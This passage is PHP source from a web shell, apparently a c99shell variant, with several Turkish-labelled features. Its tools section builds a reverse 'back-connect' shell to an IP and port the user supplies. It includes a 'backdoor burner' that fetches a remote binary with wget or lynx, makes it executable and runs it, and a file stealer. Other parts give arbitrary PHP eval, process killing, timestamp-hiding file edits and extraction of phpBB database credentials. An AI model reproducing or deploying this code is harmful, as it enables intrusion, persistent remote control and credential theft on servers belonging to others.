2872. echo "＜option value＝chmod".（$dspact ＝＝ "chmod"?" selected":""）."＞Change-mode＜/option＞";
2873. echo "＜option value＝md5file".（$dspact ＝＝ "md5file"?" selected":""）."＞MD5 Checksum＜/option＞";
2874. echo "＜option value＝sha1file".（$dspact ＝＝ "sha1file"?" selected":""）."＞SHA1 Checksum＜/option＞";
2875. if （$usefsbuff）
2876. {
2877. echo "＜option value＝cut".（$dspact ＝＝ "cut"?" selected":""）."＞Cut＜/option＞";
2878. echo "＜option value＝copy".（$dspact ＝＝ "copy"?" selected":""）."＞Copy＜/option＞";
2879. echo '＜option value＝unselect'.（$dspact ＝＝ "unselect"?" selected":""）.'＞Unselect＜/option＞';
2880. }
2881. echo '＜/select＞ ＜input type＝submit value＝"Confirm"＞＜/p＞＜/form＞';
2882. }
2883. }
2884. if （$act ＝＝ 'tools'）
2885. {
2886. ?＞
2887. ＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"116" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
2888. ＜tr＞＜td height＝1 valign＝top colspan＝2＞＜center＞＜b＞:: Bind Functions By r57 ::＜/b＞＜/center＞
2889. ＜/td＞＜/tr＞
2890. ＜tr＞＜td width＝50% height＝83 valign＝top＞
2891. ＜center＞
2892. ＜form action＝"＜?php echo $surl; ?＞"＞
2893. ＜b＞Bind With Backd00r Burner＜/b＞＜br＞
2894. ＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝hidden name＝act value＝tools＞
2895. ＜br＞
2896. ＜select size＝1 name＝"dolma"＞＜option value＝"wgetcan"＞Use Wget＜/option＞＜option value＝"lynxcan"＞Use lynx -dump＜/option＞＜option value＝"freadcan"＞Use Fread＜/option＞＜/select＞ ＜input type＝submit value＝"Burn it Baby"＞＜/form＞
2897. ＜/td＞＜td width＝50% height＝83 valign＝top＞
2898. ＜center＞
2899. ＜b＞Back-Connection＜/b＞
2900. ＜br＞＜br＞
2901. ＜form name＝form method＝POST＞Host:＜input type＝text name＝backconnectip size＝15 value＝＜?php echo $ip;?＞＞ Port: ＜input type＝text name＝backconnectport size＝15 value＝5992＞＜br＞
2902. Use: ＜select size＝1 name＝use＞＜option value＝Perl＞Perl＜/option＞＜option value＝C＞C＜/option＞＜/select＞ ＜input type＝submit name＝submit value＝Connect＞＜/form＞
2903. First, run NetCat on your computer using '＜b＞nc -l -n -v -p ＜?php echo $bc_port; ?＞＜/b＞'.＜br＞
2904. Then, click "Connect" once the port is listening.
2905. ＜/center＞
2906. ＜/td＞＜/tr＞
2907. ＜/table＞
2908. ＜TABLE style＝"BORDER-COLLAPSE: collapse" cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 height＝"116" width＝"100%" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞
2909. ＜tr＞＜td height＝1 valign＝top colspan＝2＞＜center＞＜b＞:: File Stealer Function Ripped From Tontonq's File Stealer ::＜/b＞＜/center＞＜/td＞＜/tr＞
2910. ＜tr＞
2911. ＜td width＝50% height＝83 valign＝top＞
2912. ＜center＞＜b＞Safe-Mode Bypass＜/b＞
2913. ＜form action＝"＜?php echo $surl; ?＞" method＝POST＞
2914. ＜input type＝hidden name＝act value＝tools＞
2915. ＜textarea name＝"erorr" cols＝100 rows＝10＞＜/textarea＞＜/br＞
2916. ＜input type＝"text" name＝"nere" value＝"＜?echo $real.'index.php';?＞ "size＝84＞
2917. ＜input type＝"submit" value＝"Write to File"＞
2918.  
2919. ＜/form＞
2920. ＜/center＞
2921. ＜/td＞
2922. ＜td width＝50% height＝83 valign＝top＞
2923. ＜center＞
2924. ＜form action＝"＜?php echo $surl; ?＞" method＝POST＞
2925. ＜input type＝hidden name＝act value＝tools＞
2926. Dosyanin Adresi ? ＝ ＜input type＝text name＝dosyaa size＝81 maxlength＝500＞＜br＞＜br＞
2927. Nereya Kaydolcak? ＝ ＜input type＝"text" name＝"yeniyer" size＝81 maxlength＝191 value＝"＜?php echo $real.'sploitz.zip'; ?＞"＞＜br＞＜br＞
2928. ＜input type＝submit class＝'stealthSubmit' Value＝'Dosyayi Chek'＞
2929. ＜/form＞
2930. ＜/center＞
2931. ＜/td＞＜/tr＞
2932. ＜/table＞
2933. ＜?php
2934.  
2935. if （isset（$_POST['dosyaa']））
2936. {
2937. dosyayicek（$_POST['dosyaa'],$_POST['yeniyer']）;
2938.  
2939. }
2940. if （!empty（$_GET['ipi']） && !empty（$_GET['pipi']））
2941. {
2942. cf（"/tmp/back",$back_connect）;
2943. $p2＝which（"perl"）;
2944. $blah ＝ ex（$p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"）;
2945. echo"＜b＞Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...＜/b＞";
2946. }
2947. if （!empty（$_GET['dolma']））
2948. {
2949. $sayko＝htmlspecialchars（$_GET['dolma']）;
2950. if （$sayko ＝＝ "wgetcan"）
2951. {
2952.  
2953. myshellexec（"wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"）;
2954.  
2955.  
2956. }
2957.  
2958. else if （$sayko ＝＝"freadcan"）
2959. {
2960. dosyayicek（$adires,"sayko_bind"）;
2961. myshellexec（"./sayko_bind"）;
2962. }
2963.  
2964. else if （$sayko ＝＝ "lynxcan"）
2965. {
2966. myshellexec（"lynx -dump $adires ＞ sayko_bind;chmod 777 sayko_bind;./sayko_bind"）;
2967.  
2968. }
2969.  
2970.  
2971.  
2972.  
2973.  
2974. }
2975.  
2976. if （!empty（$_POST['erorr']））
2977. {
2978.  
2979.  
2980.  
2981. error_log（$_POST['erorr'], 3, "php://".$_POST['nere']）;
2982.  
2983.  
2984.  
2985. }
2986.  
2987.  
2988.  
2989.  
2990.  
2991.  
2992.  
2993.  
2994.  
2995. }
2996. if （$act ＝＝ "processes"）
2997. {
2998. echo "＜b＞Processes:＜/b＞＜br＞";
2999. if （!$win） {$handler ＝ "ps -aux".（$grep?" | grep '".addslashes（$grep）."'":""）;}
3000. else {$handler ＝ "tasklist";}
3001. $ret ＝ myshellexec（$handler）;
3002. if （!$ret） {echo "Can't execute \"".$handler."\"!";}
3003. else
3004. {
3005. if （empty（$processes_sort）） {$processes_sort ＝ $sort_default;}
3006. $parsesort ＝ parsesort（$processes_sort）;
3007. if （!is_numeric（$parsesort[0]）） {$parsesort[0] ＝ 0;}
3008. $k ＝ $parsesort[0];
3009. if （$parsesort[1] !＝ "a"） {$y ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$k."a\"＞＜img src＝\"".$surl."act＝img&img＝sort_desc\" height＝\"9\" width＝\"14\" border＝\"0\"＞＜/a＞";}
3010. else {$y ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$k."d\"＞＜img src＝\"".$surl."act＝img&img＝sort_asc\" height＝\"9\" width＝\"14\" border＝\"0\"＞＜/a＞";}
3011. $ret ＝ htmlspecialchars（$ret）;
3012. if （!$win）
3013. {
3014. if （$pid）
3015. {
3016. if （is_null（$sig）） {$sig ＝ 9;}
3017. echo "Sending signal ".$sig." to #".$pid."... ";
3018. if （posix_kill（$pid,$sig）） {echo "OK.";}
3019. else {echo "ERROR.";}
3020. }
3021. while （ereg（" ",$ret）） {$ret ＝ str_replace（" "," ",$ret）;}
3022. $stack ＝ explode（"\n",$ret）;
3023. $head ＝ explode（" ",$stack[0]）;
3024. unset（$stack[0]）;
3025. for（$i＝0;$i＜count（$head）;$i++）
3026. {
3027. if （$i !＝ $k） {$head[$i] ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$i.$parsesort[1]."\"＞＜b＞".$head[$i]."＜/b＞＜/a＞";}
3028. }
3029. $prcs ＝ array（）;
3030. foreach （$stack as $line）
3031. {
3032. if （!empty（$line））
3033. {
3034. echo "＜tr＞";
3035. $line ＝ explode（" ",$line）;
3036. $line[10] ＝ join（" ",array_slice（$line,10））;
3037. $line ＝ array_slice（$line,0,11）;
3038. if （$line[0] ＝＝ get_current_user（）） {$line[0] ＝ "＜font color＝green＞".$line[0]."＜/font＞";}
3039. $line[] ＝ "＜a href＝\"".$surl."act＝processes&d＝".urlencode（$d）."&pid＝".$line[1]."&sig＝9\"＞＜u＞KILL＜/u＞＜/a＞";
3040. $prcs[] ＝ $line;
3041. echo "＜/tr＞";
3042. }
3043. }
3044. }
3045. else
3046. {
3047. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3048. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3049. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3050. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3051. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3052. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3053. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3054. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3055. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3056. while （ereg（"",$ret）） {$ret ＝ str_replace（"","",$ret）;}
3057. while （ereg（" ",$ret）） {$ret ＝ str_replace（" ","",$ret）;}
3058. $ret ＝ convert_cyr_string（$ret,"d","w"）;
3059. $stack ＝ explode（"\n",$ret）;
3060. unset（$stack[0],$stack[2]）;
3061. $stack ＝ array_values（$stack）;
3062. $head ＝ explode（"",$stack[0]）;
3063. $head[1] ＝ explode（" ",$head[1]）;
3064. $head[1] ＝ $head[1][0];
3065. $stack ＝ array_slice（$stack,1）;
3066. unset（$head[2]）;
3067. $head ＝ array_values（$head）;
3068. if （$parsesort[1] !＝ "a"） {$y ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$k."a\"＞＜img src＝\"".$surl."act＝img&img＝sort_desc\" height＝\"9\" width＝\"14\" border＝\"0\"＞＜/a＞";}
3069. else {$y ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$k."d\"＞＜img src＝\"".$surl."act＝img&img＝sort_asc\" height＝\"9\" width＝\"14\" border＝\"0\"＞＜/a＞";}
3070. if （$k ＞ count（$head）） {$k ＝ count（$head）-1;}
3071. for（$i＝0;$i＜count（$head）;$i++）
3072. {
3073. if （$i !＝ $k） {$head[$i] ＝ "＜a href＝\"".$surl."act＝".$dspact."&d＝".urlencode（$d）."&processes_sort＝".$i.$parsesort[1]."\"＞＜b＞".trim（$head[$i]）."＜/b＞＜/a＞";}
3074. }
3075. $prcs ＝ array（）;
3076. foreach （$stack as $line）
3077. {
3078. if （!empty（$line））
3079. {
3080. echo "＜tr＞";
3081. $line ＝ explode（"",$line）;
3082. $line[1] ＝ intval（$line[1]）; $line[2] ＝ $line[3]; unset（$line[3]）;
3083. $line[2] ＝ intval（str_replace（" ","",$line[2]））*1024;
3084. $prcs[] ＝ $line;
3085. echo "＜/tr＞";
3086. }
3087. }
3088. }
3089. $head[$k] ＝ "＜b＞".$head[$k]."＜/b＞".$y;
3090. $v ＝ $processes_sort[0];
3091. usort（$prcs,"tabsort"）;
3092. if （$processes_sort[1] ＝＝ "d"） {$prcs ＝ array_reverse（$prcs）;}
3093. $tab ＝ array（）;
3094. $tab[] ＝ $head;
3095. $tab ＝ array_merge（$tab,$prcs）;
3096. echo "＜TABLE height＝1 cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1 bordercolor＝\"#C0C0C0\"＞";
3097. foreach（$tab as $i＝＞$k）
3098. {
3099. echo "＜tr＞";
3100. foreach（$k as $j＝＞$v） {if （$win and $i ＞ 0 and $j ＝＝ 2） {$v ＝ view_size（$v）;} echo "＜td＞".$v."＜/td＞";}
3101. echo "＜/tr＞";
3102. }
3103. echo "＜/table＞";
3104. }
3105. }
3106. if （$act ＝＝ "eval"）
3107. {
3108. if （!empty（$eval））
3109. {
3110. echo "＜b＞Result of execution this PHP-code＜/b＞:＜br＞";
3111. $tmp ＝ ob_get_contents（）;
3112. $olddir ＝ realpath（"."）;
3113. @chdir（$d）;
3114. if （$tmp）
3115. {
3116. ob_clean（）;
3117. eval（$eval）;
3118. $ret ＝ ob_get_contents（）;
3119. $ret ＝ convert_cyr_string（$ret,"d","w"）;
3120. ob_clean（）;
3121. echo $tmp;
3122. if （$eval_txt）
3123. {
3124. $rows ＝ count（explode（"\r\n",$ret））+1;
3125. if （$rows ＜ 10） {$rows ＝ 10;}
3126. echo "＜br＞＜textarea cols＝\"122\" rows＝\"".$rows."\" readonly＞".htmlspecialchars（$ret）."＜/textarea＞";
3127. }
3128. else {echo $ret."＜br＞";}
3129. }
3130. else
3131. {
3132. if （$eval_txt）
3133. {
3134. echo "＜br＞＜textarea cols＝\"122\" rows＝\"15\" readonly＞";
3135. eval（$eval）;
3136. echo "＜/textarea＞";
3137. }
3138. else {echo $ret;}
3139. }
3140. @chdir（$olddir）;
3141. }
3142. else {echo "＜b＞Execution PHP-code＜/b＞"; if （empty（$eval_txt）） {$eval_txt ＝ TRUE;}}
3143. echo "＜form action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝act value＝eval＞＜textarea name＝\"eval\" cols＝\"122\" rows＝\"10\"＞".htmlspecialchars（$eval）."＜/textarea＞＜input type＝hidden name＝\"d\" value＝\"".$dispd."\"＞＜br＞＜br＞＜input type＝submit value＝\"Execute\"＞ Display in text-area ＜input type＝\"checkbox\" name＝\"eval_txt\" value＝\"1\""; if （$eval_txt） {echo " checked";} echo "＞＜/form＞";
3144. }
3145. if （$act ＝＝ "f"）
3146. {
3147. if （（!is_readable（$d.$f） or is_dir（$d.$f）） and $ft !＝ "edit"）
3148. {
3149. if （file_exists（$d.$f）） {echo "＜center＞＜b＞Permision denied （".htmlspecialchars（$d.$f）."）!＜/b＞＜/center＞";}
3150. else {echo "＜center＞＜b＞File does not exists （".htmlspecialchars（$d.$f）."）!＜/b＞＜br＞＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝edit&d＝".urlencode（$d）."&c＝1\"＞＜u＞Create＜/u＞＜/a＞＜/center＞";}
3151. }
3152. else
3153. {
3154. $r ＝ @file_get_contents（$d.$f）;
3155. $ext ＝ explode（".",$f）;
3156. $c ＝ count（$ext）-1;
3157. $ext ＝ $ext[$c];
3158. $ext ＝ strtolower（$ext）;
3159. $rft ＝ "";
3160. foreach（$ftypes as $k＝＞$v） {if （in_array（$ext,$v）） {$rft ＝ $k; break;}}
3161. if （eregi（"sess_（.*）",$f）） {$rft ＝ "phpsess";}
3162. if （empty（$ft）） {$ft ＝ $rft;}
3163. $arr ＝ array（
3164. array（"＜img src＝\"".$surl."act＝img&img＝ext_diz\" border＝\"0\"＞","info"）,
3165. array（"＜img src＝\"".$surl."act＝img&img＝ext_html\" border＝\"0\"＞","html"）,
3166. array（"＜img src＝\"".$surl."act＝img&img＝ext_txt\" border＝\"0\"＞","txt"）,
3167. array（"Code","code"）,
3168. array（"Session","phpsess"）,
3169. array（"＜img src＝\"".$surl."act＝img&img＝ext_exe\" border＝\"0\"＞","exe"）,
3170. array（"SDB","sdb"）,
3171. array（"＜img src＝\"".$surl."act＝img&img＝ext_gif\" border＝\"0\"＞","img"）,
3172. array（"＜img src＝\"".$surl."act＝img&img＝ext_ini\" border＝\"0\"＞","ini"）,
3173. array（"＜img src＝\"".$surl."act＝img&img＝download\" border＝\"0\"＞","download"）,
3174. array（"＜img src＝\"".$surl."act＝img&img＝ext_rtf\" border＝\"0\"＞","notepad"）,
3175. array（"＜img src＝\"".$surl."act＝img&img＝change\" border＝\"0\"＞","edit"）
3176. ）;
3177. echo "＜b＞Viewing file:    ＜img src＝\"".$surl."act＝img&img＝ext_".$ext."\" border＝\"0\"＞ ".$f." （".view_size（filesize（$d.$f））."）      ".view_perms_color（$d.$f）."＜/b＞＜br＞Select action/file-type:＜br＞";
3178. foreach（$arr as $t）
3179. {
3180. if （$t[1] ＝＝ $rft） {echo " ＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝".$t[1]."&d＝".urlencode（$d）."\"＞＜font color＝green＞".$t[0]."＜/font＞＜/a＞";}
3181. elseif （$t[1] ＝＝ $ft） {echo " ＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝".$t[1]."&d＝".urlencode（$d）."\"＞＜b＞＜u＞".$t[0]."＜/u＞＜/b＞＜/a＞";}
3182. else {echo " ＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝".$t[1]."&d＝".urlencode（$d）."\"＞＜b＞".$t[0]."＜/b＞＜/a＞";}
3183. echo " （＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝".$t[1]."&white＝1&d＝".urlencode（$d）."\" target＝\"_blank\"＞+＜/a＞） |";
3184. }
3185. echo "＜hr size＝\"1\" noshade＞";
3186. if （$ft ＝＝ "info"）
3187. {
3188. echo "＜b＞Information:＜/b＞＜table border＝0 cellspacing＝1 cellpadding＝2＞＜tr＞＜td＞＜b＞Path＜/b＞＜/td＞＜td＞ ".$d.$f."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞Size＜/b＞＜/td＞＜td＞ ".view_size（filesize（$d.$f））."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞MD5＜/b＞＜/td＞＜td＞ ".md5_file（$d.$f）."＜/td＞＜/tr＞";
3189. if （!$win）
3190. {
3191. echo "＜tr＞＜td＞＜b＞Owner/Group＜/b＞＜/td＞＜td＞ ";
3192. $ow ＝ posix_getpwuid（fileowner（$d.$f））;
3193. $gr ＝ posix_getgrgid（filegroup（$d.$f））;
3194. echo （$ow["name"]?$ow["name"]:fileowner（$d.$f））."/".（$gr["name"]?$gr["name"]:filegroup（$d.$f））;
3195. }
3196. echo "＜tr＞＜td＞＜b＞Perms＜/b＞＜/td＞＜td＞＜a href＝\"".$surl."act＝chmod&f＝".urlencode（$f）."&d＝".urlencode（$d）."\"＞".view_perms_color（$d.$f）."＜/a＞＜/td＞＜/tr＞＜tr＞＜td＞＜b＞Create time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",filectime（$d.$f））."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞Access time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",fileatime（$d.$f））."＜/td＞＜/tr＞＜tr＞＜td＞＜b＞MODIFY time＜/b＞＜/td＞＜td＞ ".date（"d/m/Y H:i:s",filemtime（$d.$f））."＜/td＞＜/tr＞＜/table＞＜br＞";
3197. $fi ＝ fopen（$d.$f,"rb"）;
3198. if （$fi）
3199. {
3200. if （$fullhexdump） {echo "＜b＞FULL HEXDUMP＜/b＞"; $str ＝ fread（$fi,filesize（$d.$f））;}
3201. else {echo "＜b＞HEXDUMP PREVIEW＜/b＞"; $str ＝ fread（$fi,$hexdump_lines*$hexdump_rows）;}
3202. $n ＝ 0;
3203. $a0 ＝ "00000000＜br＞";
3204. $a1 ＝ "";
3205. $a2 ＝ "";
3206. for （$i＝0; $i＜strlen（$str）; $i++）
3207. {
3208. $a1 .＝ sprintf（"%02X",ord（$str[$i]））." ";
3209. switch （ord（$str[$i]））
3210. {
3211. case 0: $a2 .＝ "＜font＞0＜/font＞"; break;
3212. case 32:
3213. case 10:
3214. case 13: $a2 .＝ " "; break;
3215. default: $a2 .＝ htmlspecialchars（$str[$i]）;
3216. }
3217. $n++;
3218. if （$n ＝＝ $hexdump_rows）
3219. {
3220. $n ＝ 0;
3221. if （$i+1 ＜ strlen（$str）） {$a0 .＝ sprintf（"%08X",$i+1）."＜br＞";}
3222. $a1 .＝ "＜br＞";
3223. $a2 .＝ "＜br＞";
3224. }
3225. }
3226. //if （$a1 !＝ ""） {$a0 .＝ sprintf（"%08X",$i）."＜br＞";}
3227. echo "＜table border＝0 bgcolor＝#666666 cellspacing＝1 cellpadding＝4＞＜tr＞＜td bgcolor＝#666666＞".$a0."＜/td＞＜td bgcolor＝000000＞".$a1."＜/td＞＜td bgcolor＝000000＞".$a2."＜/td＞＜/tr＞＜/table＞＜br＞";
3228. }
3229. $encoded ＝ "";
3230. if （$base64 ＝＝ 1）
3231. {
3232. echo "＜b＞Base64 Encode＜/b＞＜br＞";
3233. $encoded ＝ base64_encode（file_get_contents（$d.$f））;
3234. }
3235. elseif（$base64 ＝＝ 2）
3236. {
3237. echo "＜b＞Base64 Encode + Chunk＜/b＞＜br＞";
3238. $encoded ＝ chunk_split（base64_encode（file_get_contents（$d.$f）））;
3239. }
3240. elseif（$base64 ＝＝ 3）
3241. {
3242. echo "＜b＞Base64 Encode + Chunk + Quotes＜/b＞＜br＞";
3243. $encoded ＝ base64_encode（file_get_contents（$d.$f））;
3244. $encoded ＝ substr（preg_replace（"!.{1,76}!","'\\0'.\n",$encoded）,0,-2）;
3245. }
3246. elseif（$base64 ＝＝ 4）
3247. {
3248. $text ＝ file_get_contents（$d.$f）;
3249. $encoded ＝ base64_decode（$text）;
3250. echo "＜b＞Base64 Decode";
3251. if （base64_encode（$encoded） !＝ $text） {echo " （failed）";}
3252. echo "＜/b＞＜br＞";
3253. }
3254. if （!empty（$encoded））
3255. {
3256. echo "＜textarea cols＝80 rows＝10＞".htmlspecialchars（$encoded）."＜/textarea＞＜br＞＜br＞";
3257. }
3258. echo "＜b＞HEXDUMP:＜/b＞＜nobr＞ [＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&fullhexdump＝1&d＝".urlencode（$d）."\"＞Full＜/a＞] [＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&d＝".urlencode（$d）."\"＞Preview＜/a＞]＜br＞＜b＞Base64: ＜/b＞
3259. ＜nobr＞[＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&base64＝1&d＝".urlencode（$d）."\"＞Encode＜/a＞] ＜/nobr＞
3260. ＜nobr＞[＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&base64＝2&d＝".urlencode（$d）."\"＞+chunk＜/a＞] ＜/nobr＞
3261. ＜nobr＞[＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&base64＝3&d＝".urlencode（$d）."\"＞+chunk+quotes＜/a＞] ＜/nobr＞
3262. ＜nobr＞[＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝info&base64＝4&d＝".urlencode（$d）."\"＞Decode＜/a＞] ＜/nobr＞
3263. ＜P＞";
3264. }
3265. elseif （$ft ＝＝ "html"）
3266. {
3267. if （$white） {@ob_clean（）;}
3268. echo $r;
3269. if （$white） {c99shexit（）;}
3270. }
3271. elseif （$ft ＝＝ "txt"） {echo "＜pre＞".htmlspecialchars（$r）."＜/pre＞";}
3272. elseif （$ft ＝＝ "ini"） {echo "＜pre＞"; var_dump（parse_ini_file（$d.$f,TRUE））; echo "＜/pre＞";}
3273. elseif （$ft ＝＝ "phpsess"）
3274. {
3275. echo "＜pre＞";
3276. $v ＝ explode（"|",$r）;
3277. echo $v[0]."＜br＞";
3278. var_dump（unserialize（$v[1]））;
3279. echo "＜/pre＞";
3280. }
3281. elseif （$ft ＝＝ "exe"）
3282. {
3283. $ext ＝ explode（".",$f）;
3284. $c ＝ count（$ext）-1;
3285. $ext ＝ $ext[$c];
3286. $ext ＝ strtolower（$ext）;
3287. $rft ＝ "";
3288. foreach（$exeftypes as $k＝＞$v）
3289. {
3290. if （in_array（$ext,$v）） {$rft ＝ $k; break;}
3291. }
3292. $cmd ＝ str_replace（"%f%",$f,$rft）;
3293. echo "＜b＞Execute file:＜/b＞＜form action＝\"".$surl."\" method＝POST＞＜input type＝hidden name＝act value＝cmd＞＜input type＝\"text\" name＝\"cmd\" value＝\"".htmlspecialchars（$cmd）."\" size＝\"".（strlen（$cmd）+2）."\"＞＜br＞Display in text-area＜input type＝\"checkbox\" name＝\"cmd_txt\" value＝\"1\" checked＞＜input type＝hidden name＝\"d\" value＝\"".htmlspecialchars（$d）."\"＞＜br＞＜input type＝submit name＝submit value＝\"Execute\"＞＜/form＞";
3294. }
3295. elseif （$ft ＝＝ "sdb"） {echo "＜pre＞"; var_dump（unserialize（base64_decode（$r）））; echo "＜/pre＞";}
3296. elseif （$ft ＝＝ "code"）
3297. {
3298. if （ereg（"php"."BB 2.（.*） auto-generated config file",$r））
3299. {
3300. $arr ＝ explode（"\n",$r）;
3301. if （count（$arr ＝＝ 18））
3302. {
3303. include（$d.$f）;
3304. echo "＜b＞phpBB configuration is detected in this file!＜br＞";
3305. if （$dbms ＝＝ "mysql4"） {$dbms ＝ "mysql";}
3306. if （$dbms ＝＝ "mysql"） {echo "＜a href＝\"".$surl."act＝sql&sql_server＝".htmlspecialchars（$dbhost）."&sql_login＝".htmlspecialchars（$dbuser）."&sql_passwd＝".htmlspecialchars（$dbpasswd）."&sql_port＝3306&sql_db＝".htmlspecialchars（$dbname）."\"＞＜b＞＜u＞Connect to DB＜/u＞＜/b＞＜/a＞＜br＞＜br＞";}
3307. else {echo "But, you can't connect to forum sql-base, because db-software＝\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
3308. echo "Parameters for manual connect:＜br＞";
3309. $cfgvars ＝ array（"dbms"＝＞$dbms,"dbhost"＝＞$dbhost,"dbname"＝＞$dbname,"dbuser"＝＞$dbuser,"dbpasswd"＝＞$dbpasswd）;
3310. foreach （$cfgvars as $k＝＞$v） {echo htmlspecialchars（$k）."＝'".htmlspecialchars（$v）."'＜br＞";}
3311. echo "＜/b＞＜hr size＝\"1\" noshade＞";
3312. }
3313. }
3314. echo "＜div style＝\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\"＞";
3315. if （!empty（$white）） {@ob_clean（）;}
3316. highlight_file（$d.$f）;
3317. if （!empty（$white）） {c99shexit（）;}
3318. echo "＜/div＞";
3319. }
3320. elseif （$ft ＝＝ "download"）
3321. {
3322. @ob_clean（）;
3323. header（"Content-type: application/octet-stream"）;
3324. header（"Content-length: ".filesize（$d.$f））;
3325. header（"Content-disposition: attachment; filename＝\"".$f."\";"）;
3326. echo $r;
3327. exit;
3328. }
3329. elseif （$ft ＝＝ "notepad"）
3330. {
3331. @ob_clean（）;
3332. header（"Content-type: text/plain"）;
3333. header（"Content-disposition: attachment; filename＝\"".$f.".txt\";"）;
3334. echo（$r）;
3335. exit;
3336. }
3337. elseif （$ft ＝＝ "img"）
3338. {
3339. $inf ＝ getimagesize（$d.$f）;
3340. if （!$white）
3341. {
3342. if （empty（$imgsize）） {$imgsize ＝ 20;}
3343. $width ＝ $inf[0]/100*$imgsize;
3344. $height ＝ $inf[1]/100*$imgsize;
3345. echo "＜center＞＜b＞Size:＜/b＞ ";
3346. $sizes ＝ array（"100","50","20"）;
3347. foreach （$sizes as $v）
3348. {
3349. echo "＜a href＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝img&d＝".urlencode（$d）."&imgsize＝".$v."\"＞";
3350. if （$imgsize !＝ $v ） {echo $v;}
3351. else {echo "＜u＞".$v."＜/u＞";}
3352. echo "%＜/a＞  ";
3353. }
3354. echo "＜br＞＜br＞＜img src＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝img&white＝1&d＝".urlencode（$d）."\" width＝\"".$width."\" height＝\"".$height."\" border＝\"1\"＞＜/center＞";
3355. }
3356. else
3357. {
3358. @ob_clean（）;
3359. $ext ＝ explode（$f,"."）;
3360. $ext ＝ $ext[count（$ext）-1];
3361. header（"Content-type: ".$inf["mime"]）;
3362. readfile（$d.$f）;
3363. exit;
3364. }
3365. }
3366. elseif （$ft ＝＝ "edit"）
3367. {
3368. if （!empty（$submit））
3369. {
3370. if （$filestealth） {$stat ＝ stat（$d.$f）;}
3371. $fp ＝ fopen（$d.$f,"w"）;
3372. if （!$fp） {echo "＜b＞Can't write to file!＜/b＞";}
3373. else
3374. {
3375. echo "＜b＞Saved!＜/b＞";
3376. fwrite（$fp,$edit_text）;
3377. fclose（$fp）;
3378. if （$filestealth） {touch（$d.$f,$stat[9],$stat[8]）;}
3379. $r ＝ $edit_text;
3380. }
3381. }
3382. $rows ＝ count（explode（"\r\n",$r））;
3383. if （$rows ＜ 10） {$rows ＝ 10;}
3384. if （$rows ＞ 30） {$rows ＝ 30;}
3385. echo "＜form action＝\"".$surl."act＝f&f＝".urlencode（$f）."&ft＝edit&d＝".urlencode（$d）."\" method＝POST＞＜input type＝submit name＝submit value＝\"Save\"＞ ＜input type＝\"reset\" value＝\"Reset\"＞ ＜input type＝\"button\" onclick＝\"location.href＝'".addslashes（$surl."act＝ls&d＝".substr（$d,0,-1））."';\" value＝\"Back\"＞＜br＞＜textarea name＝\"edit_text\" cols＝\"122\" rows＝\"".$rows."\"＞".htmlspecialchars（$r）."＜/textarea＞＜/form＞";
3386. }
3387. elseif （!empty（$ft）） {echo "＜center＞＜b＞Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.＜/b＞＜/center＞";}
3388. else {echo "＜center＞＜b＞Unknown extension （".$ext."）, please, select type manually.＜/b＞＜/center＞";}
3389. }
3390. }
3391. }
3392. else
3393. {
3394. @ob_clean（）;
3395. $images ＝ array（
3396. "arrow_ltr"＝＞
3397. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
3398. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw＝＝",
